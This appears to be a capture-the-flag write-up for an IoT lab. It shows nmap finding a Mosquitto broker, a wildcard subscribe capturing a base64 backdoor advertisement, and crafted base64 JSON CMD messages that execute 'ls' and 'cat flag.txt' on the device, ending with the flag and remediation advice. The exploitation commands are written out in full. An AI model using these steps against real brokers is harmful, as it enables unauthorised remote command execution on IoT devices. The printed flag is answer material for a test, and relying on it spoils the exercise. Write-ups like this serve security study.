MQTT wildcard subscribe and backdoor CMD channel to flag
Foundations IoT engagement: Mosquitto broker accepted wildcard subscribe; a base64-encoded backdoor advertisement exposed pub/sub topics and a CMD interface that executed cat flag.txt.
- Case files
- MQTT wildcard subscribe and backdoor CMD channel to flag
Nmap found MQTT; mosquitto_sub on # captured a backdoor JSON; formatted CMD messages on the sub topic returned directory listings and flag.txt contents.
Installed Mosquitto clients; subscribed to #; decoded advertisement JSON for pub/sub topics and CMD.
Published base64 CMD envelopes on sub_topic; responses on pub_topic included flag contents.
Engagement summary
Nmap found MQTT; mosquitto_sub on # captured a backdoor JSON; formatted CMD messages on the sub topic returned directory listings and flag.txt contents.
BUGGED presented as a smart-home appliance network with anomalous broker traffic. Service scan identified Mosquitto. Subscribing to topic # with mosquitto_sub immediately received a base64 blob advertising a backdoor: registered commands HELP/CMD/SYS plus dedicated pub and sub topic paths. Publishing malformed probes to the sub topic returned a base64 error describing the required JSON shape {id, cmd, arg}. A correctly framed CMD with arg ls listed flag.txt; CMD with arg cat flag.txt returned the engagement secret over the pub topic. No authentication on the broker; full remote command channel via MQTT.
Business impact
Unauthenticated MQTT brokers are remote shells when devices expose command topics. IoT backdoors riding production messaging buses exfiltrate filesystem data without touching HTTP. Require mutual TLS, ACLs per client, and deny wildcard subscribe for untrusted principals.
Wildcard subscribe and backdoor decode
Installed Mosquitto clients; subscribed to #; decoded advertisement JSON for pub/sub topics and CMD.
OPERATOR · MQTT
savvy@lab:~$ sudo nmap -sV -sC 10.10.10.10
1883/tcp open mqtt Mosquitto
savvy@lab:~$ mosquitto_sub -t "#" -h 10.10.10.10
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
savvy@lab:~$ echo "eyJpZCI6..." | base64 -d | jq .
id, registered_commands:[HELP,CMD,SYS], pub_topic, sub_topic
BACKDOOR ADVERTISEMENT
backdoor.json
{
"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",
"registered_commands": ["HELP", "CMD", "SYS"],
"pub_topic": "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
"sub_topic": "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"
}CMD channel execution to flag.txt
Published base64 CMD envelopes on sub_topic; responses on pub_topic included flag contents.
OPERATOR · CMD
savvy@lab:~$ mosquitto_sub -t "U4vyqNlQtf/.../pub" -h 10.10.10.10 &
savvy@lab:~$ MSG=$(echo '{"id":"cdd1b1c0-...","cmd":"CMD","arg":"ls"}' | base64 -w0)
savvy@lab:~$ mosquitto_pub -t "XD2rfR9Bez/.../sub" -m "$MSG" -h 10.10.10.10
response → flag.txt
savvy@lab:~$ MSG=$(echo '{"id":"cdd1b1c0-...","cmd":"CMD","arg":"cat flag.txt"}' | base64 -w0)
savvy@lab:~$ mosquitto_pub -t "XD2rfR9Bez/.../sub" -m "$MSG" -h 10.10.10.10
flag{18d44fc0707ac8dc8be45bb83db54013}
Remediation
Authenticate every MQTT client; scope ACLs so devices cannot advertise or consume command topics. Disable or air-gap debug backdoors before production. Monitor base64 blobs on messaging buses as IoC material.